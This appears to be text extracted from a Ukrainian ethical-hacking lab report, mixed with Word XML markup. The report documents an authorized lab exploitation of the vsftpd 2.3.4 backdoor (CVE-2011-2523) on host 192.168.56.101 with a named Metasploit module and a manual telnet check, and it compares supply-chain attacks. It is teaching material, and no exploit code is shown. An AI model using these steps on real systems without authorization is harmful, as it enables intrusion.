            <w:shd w:fill="F4F6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Оригінал: 'We used Metasploit to break into the server'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Виправлений варіант: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'During authorized penetration testing, we successfully exploited CVE-2011-2523,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a supply-chain backdoor present in vsftpd 2.3.4, to obtain unauthenticated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root-level access to the target host 192.168.56.101. The vulnerability was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confirmed via Metasploit Framework module exploit/unix/ftp/vsftpd_234_backdoor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and independently reproduced via manual telnet session.'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Чому оригінальне формулювання є проблематичним (2-3 речення):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'Break into' — кримінальна термінологія, неприйнятна у технічному звіті. Фраза не пояснює ПРИЧИНУ успіху (backdoor у vsftpd), натякаючи що проблема у Metasploit, а не у вразливому ПЗ. Клієнт може дійти хибного висновку, що видалення Metasploit або блокування відповідних сигнатур усуне загрозу, тоді як backdoor залишиться і може бути використаний будь-яким іншим інструментом або вручну.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Висновки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AFC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Лабораторна робота 3 забезпечила перший контрольований досвід повного циклу пентестингу: від дослідження CVE та побудови Go/No-Go чек-листа до виконання exploit та документування знахідки у форматі, придатному для реального звіту.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Ключові результати: (1) CVE-2011-2523 успішно підтверджена та відтворена двома методами (Metasploit та ручний telnet), що доводить повну незалежність вразливості від конкретного інструменту; (2) Go/No-Go framework забезпечив юридичний та методологічний захист кожного кроку; (3) Supply-chain природа backdoor підкреслює необхідність верифікації цілісності ПЗ при встановленні з будь-якого джерела.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PhD Extension аналіз показав, що Severity/Confidence/Impact — три різних виміри, що не замінюють один одного. CVSS 10.0 однаковий для ізольованої VM та production-сервера, але Impact може відрізнятись на порядки. Порівняння трьох supply-chain атак (vsftpd, SolarWinds, XZ Utils) демонструє еволюцію складності атак: від примітивного backdoor 2011 року до багаторічної операції соціальної інженерії 2024 року.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FAFCFF"/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Головний урок: методологія PTES — це не бюрократія, а інструмент захисту клієнта, пентестера та результатів роботи від юридичних, технічних та репутаційних ризиків.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pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz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Список використаних джерел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[1] NVD NIST — CVE-2011-2523 Detail. https://nvd.nist.gov/vuln/detail/CVE-2011-2523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[2] MITRE ATT&amp;CK — T1199 (Trusted Relationship) / T1195 (Supply Chain Compromise). https://attack.mitre.org/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[3] FIRST — Common Vulnerability Scoring System v3.1 Specification. https://www.first.org/cvss/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[4] PTES — Penetration Testing Execution Standard. http://www.pentest-standard.org/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[5] Rapid7 — Metasploit Module: exploit/unix/ftp/vsftpd_234_backdoor.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[6] SolarWinds — SUNBURST Attack Technical Analysis. https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html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[7] CVE-2024-3094 — XZ Utils Backdoor. https://nvd.nist.gov/vuln/detail/CVE-2024-3094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[8] Engebretson, P. (2013). The Basics of Hacking and Penetration Testing, 2nd ed. Syngress.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Лабораторна робота 3  |  Стор.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EGR6301 — Етичний хакінг — Лабораторна робота №3 — IITU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b581e63b5dfd3c92e696657e9388046d813296.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4d6d15274f38d24b7635b6102b31f625da99bf3a.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/159d1fdf8cd3b102adb7845b8f287effa1e2987d.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/134db40f94f7a814b2c3052d76aed0f565812030.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/536a788edfee826f934281e72db27efbf57efee0.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/68d84316e1aeedcf1839b3423dd641ce5cb59746.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d1b94cb58d0361e3358404fe785bf029d272590f.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/80cd984190c84a009f7d24b843ac9896d8e3f89c.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e685174ef900b06bf9cdf012e26a84ea4cb6a38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Dmytro Bilozor</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-03T14:49:08.134Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-03T14:49:08.135Z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